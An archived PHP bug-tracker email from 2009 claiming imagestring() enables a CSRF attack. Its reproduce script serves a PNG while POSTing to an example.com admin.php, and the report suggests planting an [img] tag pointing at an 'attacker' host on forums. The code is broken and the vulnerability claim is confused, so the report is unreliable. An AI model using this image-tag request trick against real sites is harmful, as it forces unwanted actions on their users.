#47939 [NEW]: imagestring() csrf php version == (PHP 4, PHP 5)

Thu, 09 Apr 2009 14:10:21 -0700 

From:             elmasterlow at gmail dot com
Operating system: all
PHP version:      5.3CVS-2009-04-09 (CVS)
PHP Bug Type:     *Graphics related
Bug description:  imagestring() csrf php version == (PHP 4, PHP 5)

Description:
------------
With this vulnerability we could do any function in php on image.
In this case the vulnerability can be used to do a CSRF attack.
We can insert the img in BB tags at random forum for example.
I think there is any possible way to make a js code...

Reproduce code:
---------------
<?
header('Content-Type: image/png');
$img = 'obrazek.png';
$data = array ('foo' => 'bar', 'foo2' => 'bar2');
$data = http_build_query($data);
$context_options = array ('http' => array(
'method' => 'POST',
'header'=> "Content-type:
application/x-www-form-urlencoded\r\n"."Content-Length:
".strlen($data)."\r\n",
'content' => $data
));
$context = stream_context_create($context_options);
$fp = fopen('http://example.com/admin.php', 'r', false, $context);
imagestring($im, 1, 5, 5, fpassthru($fp) . $img, $tc);
imagepng($im);
imagedestroy($im);
?>

Expected result:
----------------
Insert [img]http://attacker/image.php[/img] on target site to do any
function in image.


-- 
Edit bug report at http://bugs.php.net/?id=47939&edit=1
-- 
Try a CVS snapshot (PHP 5.2):        
http://bugs.php.net/fix.php?id=47939&r=trysnapshot52
Try a CVS snapshot (PHP 5.3):        
http://bugs.php.net/fix.php?id=47939&r=trysnapshot53
Try a CVS snapshot (PHP 6.0):        
http://bugs.php.net/fix.php?id=47939&r=trysnapshot60
Fixed in CVS:                        
http://bugs.php.net/fix.php?id=47939&r=fixedcvs
Fixed in CVS and need be documented: 
http://bugs.php.net/fix.php?id=47939&r=needdocs
Fixed in release:                    
http://bugs.php.net/fix.php?id=47939&r=alreadyfixed
Need backtrace:                      
http://bugs.php.net/fix.php?id=47939&r=needtrace
Need Reproduce Script:               
http://bugs.php.net/fix.php?id=47939&r=needscript
Try newer version:                   
http://bugs.php.net/fix.php?id=47939&r=oldversion
Not developer issue:                 
http://bugs.php.net/fix.php?id=47939&r=support
Expected behavior:                   
http://bugs.php.net/fix.php?id=47939&r=notwrong
Not enough info:                     
http://bugs.php.net/fix.php?id=47939&r=notenoughinfo
Submitted twice:                     
http://bugs.php.net/fix.php?id=47939&r=submittedtwice
register_globals:                    
http://bugs.php.net/fix.php?id=47939&r=globals
PHP 4 support discontinued:          http://bugs.php.net/fix.php?id=47939&r=php4
Daylight Savings:                    http://bugs.php.net/fix.php?id=47939&r=dst
IIS Stability:                       
http://bugs.php.net/fix.php?id=47939&r=isapi
Install GNU Sed:                     
http://bugs.php.net/fix.php?id=47939&r=gnused
Floating point limitations:          
http://bugs.php.net/fix.php?id=47939&r=float
No Zend Extensions:                  
http://bugs.php.net/fix.php?id=47939&r=nozend
MySQL Configuration Error:           
http://bugs.php.net/fix.php?id=47939&r=mysqlcfg

Reply via email to